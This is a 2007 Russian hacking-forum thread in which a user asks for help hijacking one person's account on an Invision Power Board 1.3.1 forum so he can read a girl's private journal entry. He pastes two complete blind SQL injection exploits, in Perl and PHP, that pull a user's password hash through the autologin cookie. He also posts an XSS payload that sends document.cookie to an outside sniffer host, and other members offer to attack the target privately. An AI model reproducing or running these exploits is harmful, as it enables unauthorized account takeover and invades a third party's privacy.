Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)
-   -   Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final (https://forum.antichat.xyz/showthread.php?t=44694)

blackbarrie 18.07.2007 05:30

Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final
 
Помогите, пожалуйста!
Очень срочно надо взломать форум на движке Invision Power Board(U) v1.3.1 Final. Именно 1.3.1!
Мне не надо заливать никаких шеллов, надо просто получить одного пользователя! Всё дело в том, что там стоит журнал mJournal 1.5 и надо прочитать закрытое сообщение девчёнки. От этого зависит моё будущее :( :confused:

Единственное что мне удалось найти - это эксплоит
Код:

#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################



use LWP::UserAgent;



  $ua = new LWP::UserAgent;

  $ua->agent("Mosiac 1.0" . $ua->agent);



if (!$ARGV[0]) {$ARGV[0] = '';}

if (!$ARGV[3]) {$ARGV[3] = '';}



my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';

my $user = $ARGV[1];  # userid to jack

my $iver = $ARGV[2];  # version 1 or 2

my $cpre = $ARGV[3];  # cookie prefix

my $dbug = $ARGV[4];  # debug?



if (!$ARGV[2])

{

        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";

        exit;

}



my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");



my $outputs = '';



for( $i=1; $i < 33; $i++ )

{

        for( $j=0; $j < 16; $j++ )

        {

                my $current = $charset[$j];

            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :

"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";

                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);

                my $res = $ua->get($path, @cookie);



                # If we get a valid sql request then this

                # does not appear anywhere in the sources

                $pattern = '<title>(.*)Log In(.*)</title>';



                $_ = $res->content;



                if ($dbug) { print };



                if ( !(/$pattern/) )

                {

                        $outputs .= $current;

                        print "$current\n";

                    last;

                }



        }

  if ( length($outputs) < 1 )  { print "Not Exploitable!\n"; exit;    }

}

print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;

exit;

Но как я понимаю, там нужны куки пользователя, под которым хочешь войти? :confused:

Ещё попадался такой вот эксплоит
PHP код:

<?php
/* 
<= 1.3.1 Final
/str0ke
*/

$server "SERVER";
$port 80;
$file "PATH";

$target 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id 10;
$pass "";

$hex "0123456789abcdef";
for(
$i 1$i <= 32$i++ ) {
        
$idx 0;
        
$found false;

        while( !(
$found) ) {
                
$letter substr($hex$idx1);

                
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
                
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" $letter;

                
/* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR
id=$target
                                       HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

                
$header getHeader($server$port$file .
"index.php?act=Login&CODE=autologin"$cookie);
                if( !
preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
                        echo 
$i ": " $letter "\n";
                        
$found true;

                        
$hash .= $letter;
                } else {
                        
$idx++;
                }
        }
}

echo 
"\n\nFinal Hash: $hash\n";

function 
getHeader($server$port$file$cookie) {
        
$ip gethostbyname($server);
        
$fp fsockopen($ip$port);

        if (!
$fp) {
                return 
"Unknown";
        } else {
                
$com "HEAD $file HTTP/1.1\r\n";
                
$com .= "Host: $server:$port\r\n";
                
$com .= "Cookie: $cookie\r\n";
                
$com .= "Connection: close\r\n";
                
$com .= "\r\n";

                
fputs($fp$com);

                do {
                        
$header.= fread($fp512);
                } while( !
preg_match('/\r\n\r\n$/',$header) );
        }

        return 
$header;
}
?>

// milw0rm.com [2005-06-08]

Пробовал запускать у себя на DENWER - пишит много ошибок про curl. Запустил его с платного арендуемого сервака - скрипт так и не заработал как надо. Что-то долго делал, а потом ошибка, типа скрипт выполнялся дольше 30 секунд. Убрал time_limit - скрипт глухнет наглухо...


Ещё нашёл такую XSS
Код:

http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>
но
Код:

http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
не даёт желанных результатов :(

Подскажите, что делать? Есть ли какие-нибудь ещё уязвимости или что я не так делаю с эксплоитами?

M0rgan 18.07.2007 06:56

В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.

Iceangel_ 18.07.2007 07:05

Скинь ссылку в личку, посмотрю что можно сделать...

blackbarrie 19.07.2007 03:57

Цитата:

Сообщение от M0rgan
В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.

Алерт выдаёт все куки, а снифер не пашет :(


Время: 14:38